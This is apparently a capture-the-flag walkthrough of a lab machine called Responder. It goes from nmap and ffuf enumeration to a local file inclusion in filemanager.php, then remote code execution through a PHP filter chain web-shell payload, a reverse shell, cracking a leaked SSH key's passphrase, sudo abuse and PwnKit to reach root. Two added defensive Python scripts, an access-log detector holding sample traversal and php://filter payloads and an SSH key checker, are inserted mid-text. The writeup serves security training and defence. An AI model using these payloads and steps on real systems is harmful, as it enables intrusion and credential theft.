
Hack Enumerate Harder! Eat. Sleep. Repeat.


First Enumeration with nmap

# Nmap 7.94SVN scan initiated Sun Apr 14 01:37:38 2024 as: nmap -sC -sV -T4 -oN service.nmap -p 22,80 -Pn 172.16.246.130
Nmap scan report for 172.16.246.130
Host is up (0.00021s latency).

PORT   STATE    SERVICE VERSION
22/tcp filtered ssh
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 14 01:37:46 2024 -- 1 IP address (1 host up) scanned in 8.09 seconds

Only one port is open, 80/tcp (Apache 2.4.38 on Debian); 22/tcp shows as filtered.

Enumerating the web app


Opening the IP in a browser, we get a weird message saying "your answer is your answer".

┌──(n16hth4wk👽n16hth4wk-sec)-[~/Documents/Vulnyx/Responder]
└─$ ffuf -u 'http://172.16.246.130/FUZZ' -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -ic -e .php,.bak,.txt,.sql,.env,.sh,.phtml,.zip

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.5.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://172.16.246.130/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
 :: Extensions       : .php .bak .txt .sql .env .sh .phtml .zip 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

                        [Status: 200, Size: 31, Words: 6, Lines: 2, Duration: 2ms]
.php                    [Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 201ms]
.phtml                  [Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 206ms]
                        [Status: 200, Size: 31, Words: 6, Lines: 2, Duration: 5ms]
.php                    [Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 5ms]
.phtml                  [Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 5ms]
filemanager.php         [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 54ms]
server-status           [Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 7ms]
[WARN] Caught keyboard interrupt (Ctrl-C)

Fuzzing for hidden files and directories, we find filemanager.php. Opening it in a browser, we get redirected to the home page.

┌──(n16hth4wk👽n16hth4wk-sec)-[~/Documents/Vulnyx/Responder]
└─$ ffuf -ic -u "http://responder/filemanager.php?FUZZ=/etc/hosts" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -fs 0 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.5.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://responder/filemanager.php?FUZZ=/etc/hosts
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response size: 0
________________________________________________

random                  [Status: 302, Size: 183, Words: 19, Lines: 8, Duration: 9ms]
:: Progress: [87651/87651] :: Job [1/1] :: 2679 req/sec :: Duration: [0:00:32] :: Errors: 0 ::

filemanager.php looks like a potential LFI endpoint, so we fuzz its parameter name (filtering out the empty 302 responses) and get the parameter: random.


Intercepting the request with Burp Suite confirms that an LFI vulnerability is present. Let's turn the LFI into RCE.


There's a tool I use when exploiting LFI: a PHP filter chain generator that turns a file include into RCE.


First, try to trigger a phpinfo().


It triggers successfully, so let's try for RCE.


python3 php_filter_chain_generator.py --chain '<?php system($_GET["cmd"]); ?>'

Using the syntax above to create an RCE payload.
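From the defender's side, the probes in this section (a file path in a query parameter, traversal sequences, and php://filter wrappers carrying convert.iconv chains) are easy to spot in the web server's access log. The detector below is an added example and is not part of the original writeup or of any tool it mentions; the Apache combined-format log lines, the IP 172.16.246.1 and the endpoint/parameter names in it are constructed to mirror the requests described above.

```python
"""Added example, not part of the original writeup: a small detector that
reads Apache access-log lines and flags requests that look like LFI probing
or php://filter chain abuse of a parameter such as filemanager.php?random=.
The log lines below are constructed for the demo."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in Apache combined format (hypothetical traffic,
# modelled on the probes described in the writeup).
SAMPLE_LOG = """\
172.16.246.1 - - [14/Apr/2024:01:40:12 +0000] "GET /filemanager.php?random=/etc/hosts HTTP/1.1" 200 183 "-" "Mozilla/5.0"
172.16.246.1 - - [14/Apr/2024:01:41:03 +0000] "GET /filemanager.php?random=../../../../etc/passwd HTTP/1.1" 200 1400 "-" "Mozilla/5.0"
172.16.246.1 - - [14/Apr/2024:01:42:55 +0000] "GET /filemanager.php?random=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-decode/resource=php://temp&cmd=id HTTP/1.1" 200 512 "-" "curl/8.0"
172.16.246.1 - - [14/Apr/2024:01:43:10 +0000] "GET /index.html HTTP/1.1" 200 31 "-" "Mozilla/5.0"
172.16.246.1 - - [14/Apr/2024:01:43:30 +0000] "GET /filemanager.php?random=%2e%2e%2f%2e%2e%2fetc%2fshadow HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Apache combined format: client, ident, user, [timestamp], "METHOD target proto", status, ...
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators are matched against fully decoded parameter values, so encoded
# traversal (%2e%2e%2f) is caught as well as the literal form.
INDICATORS = [
    ("php_filter_wrapper", re.compile(r"php://filter", re.I)),
    ("iconv_chain", re.compile(r"convert\.iconv\.", re.I)),
    ("path_traversal", re.compile(r"(^|[\\/])\.\.([\\/]|$)")),
    ("sensitive_file", re.compile(r"/etc/(passwd|shadow|hosts)|id_rsa", re.I)),
]


def decode_target(target):
    """Split the request target into its path and a list of decoded query values."""
    parts = urlsplit(target)
    # parse_qsl already percent-decodes once; decode once more so that
    # double-encoded payloads (%252e%252e) are normalised too.
    values = [unquote(v) for _, v in parse_qsl(parts.query, keep_blank_values=True)]
    return unquote(parts.path), values


def classify_line(line):
    """Return a finding dict for a suspicious line, or None for benign/unparseable lines."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    path, values = decode_target(m.group("target"))
    hits = [name for name, pat in INDICATORS if any(pat.search(v) for v in values)]
    if not hits:
        return None
    return {
        "ip": m.group("ip"),
        "time": m.group("ts"),
        "path": path,
        "status": int(m.group("status")),
        "indicators": hits,
    }


def scan_log(text):
    """Run the classifier over every line of an access log and collect the findings."""
    return [f for f in (classify_line(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"{finding['time']} {finding['ip']} {finding['path']} "
              f"{finding['status']} -> {', '.join(finding['indicators'])}")
```

Note that the 302 with a 0-byte body on the last line is not by itself an indicator: on this target the endpoint answers every unknown parameter with that redirect, so a burst of those from one client is the parameter-name fuzzing seen earlier, while the 200 responses carrying traversal or php://filter values are the successful reads.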


We have RCE! Let's spawn a reverse shell.


We got a reverse shell!

Privilege Escalation


In the web root directory, filemanager.php contains an id_rsa private key.


Using ssh2john to convert the key into a hash and cracking it with hashcat, we get the passphrase elliott.


Log in using the id_rsa key and its passphrase.
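The key only became useful because it sat in a web-readable location and its passphrase fell to a wordlist. When such a key turns up during a review, the first question is whether it is protected at all and how much work each guess costs. The following added example (mine, not code from the writeup or from ssh2john/hashcat) parses just the header of an OpenSSH-format private key, which is enough to read the cipher, the KDF and the bcrypt round count; `make_sample_key` builds structurally valid but dummy keys so the check runs offline, and the "16 rounds" threshold is the ssh-keygen default.

```python
"""Added example, not part of the original writeup: inspect an OpenSSH
private key file (e.g. one found in a web root) and report whether it is
passphrase-protected and how expensive its KDF is.  Only the header is
parsed; the key material itself is never touched."""
import base64
import struct

PEM_HEAD = "-----BEGIN OPENSSH PRIVATE KEY-----"
PEM_TAIL = "-----END OPENSSH PRIVATE KEY-----"
MAGIC = b"openssh-key-v1\x00"
DEFAULT_ROUNDS = 16  # ssh-keygen's default for -a


def _read_string(buf, off):
    """Read one SSH wire-format string (uint32 length + bytes) at offset."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def _ssh_string(b):
    return struct.pack(">I", len(b)) + b


def parse_openssh_key_header(pem_text):
    """Return cipher name, KDF name, bcrypt rounds and an 'encrypted' flag."""
    lines = [l.strip() for l in pem_text.strip().splitlines()]
    if not lines or lines[0] != PEM_HEAD or lines[-1] != PEM_TAIL:
        raise ValueError("not an OpenSSH-format private key")
    blob = base64.b64decode("".join(lines[1:-1]))
    if not blob.startswith(MAGIC):
        raise ValueError("bad magic; not openssh-key-v1")
    off = len(MAGIC)
    cipher, off = _read_string(blob, off)
    kdf, off = _read_string(blob, off)
    kdfopts, off = _read_string(blob, off)
    rounds = None
    if kdf == b"bcrypt":
        # kdfoptions = string salt + uint32 rounds
        _salt, o = _read_string(kdfopts, 0)
        (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
    return {
        "cipher": cipher.decode(),
        "kdf": kdf.decode(),
        "rounds": rounds,
        "encrypted": cipher != b"none",
    }


def assess(info):
    """Turn the parsed header into a one-line verdict for a review note."""
    if not info["encrypted"]:
        return "CRITICAL: key is unencrypted; anyone who can read the file can use it"
    if info["kdf"] == "bcrypt" and info["rounds"] < DEFAULT_ROUNDS:
        return (f"WARNING: bcrypt with only {info['rounds']} rounds; an exposed key "
                f"with a weak passphrase cracks quickly")
    return "encrypted; an exposed key still needs rotating"


def make_sample_key(cipher, kdf, rounds=DEFAULT_ROUNDS):
    """Build a minimal header-valid key for testing (constructed dummy data,
    not a real key: the public/private sections are placeholder bytes)."""
    kdfopts = b""
    if kdf == b"bcrypt":
        kdfopts = _ssh_string(b"\x00" * 16) + struct.pack(">I", rounds)
    blob = (MAGIC + _ssh_string(cipher) + _ssh_string(kdf) + _ssh_string(kdfopts)
            + struct.pack(">I", 1)                 # number of keys
            + _ssh_string(b"dummy-public-section")
            + _ssh_string(b"dummy-private-section"))
    b64 = base64.b64encode(blob).decode()
    body = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f"{PEM_HEAD}\n{body}\n{PEM_TAIL}\n"


if __name__ == "__main__":
    for name, pem in [
        ("unencrypted", make_sample_key(b"none", b"none")),
        ("weak-kdf", make_sample_key(b"aes256-ctr", b"bcrypt", rounds=8)),
        ("default", make_sample_key(b"aes256-ctr", b"bcrypt")),
    ]:
        info = parse_openssh_key_header(pem)
        print(f"{name:12} {info['cipher']:11} {info['kdf']:7} rounds={info['rounds']} -> {assess(info)}")
```

To use it on a real file, read the file's text and pass it to `parse_openssh_key_header`; legacy PEM keys (`BEGIN RSA PRIVATE KEY`) use a different container and are rejected by the format check rather than misreported.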

elliot@responder:~$ sudo -l
Matching Defaults entries for elliot on responder:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User elliot may run the following commands on responder:
    (rohit) NOPASSWD: /usr/bin/calc
elliot@responder:~$ 

Checking sudo permissions, we see we can run /usr/bin/calc as user rohit without a password.


Abusing the calc binary gives us a shell as user rohit.


After a lot of research into ways to escalate further, I decided to try PwnKit.


Followed the instructions from GitHub and boom, we rooted it!


And we are through! 🙂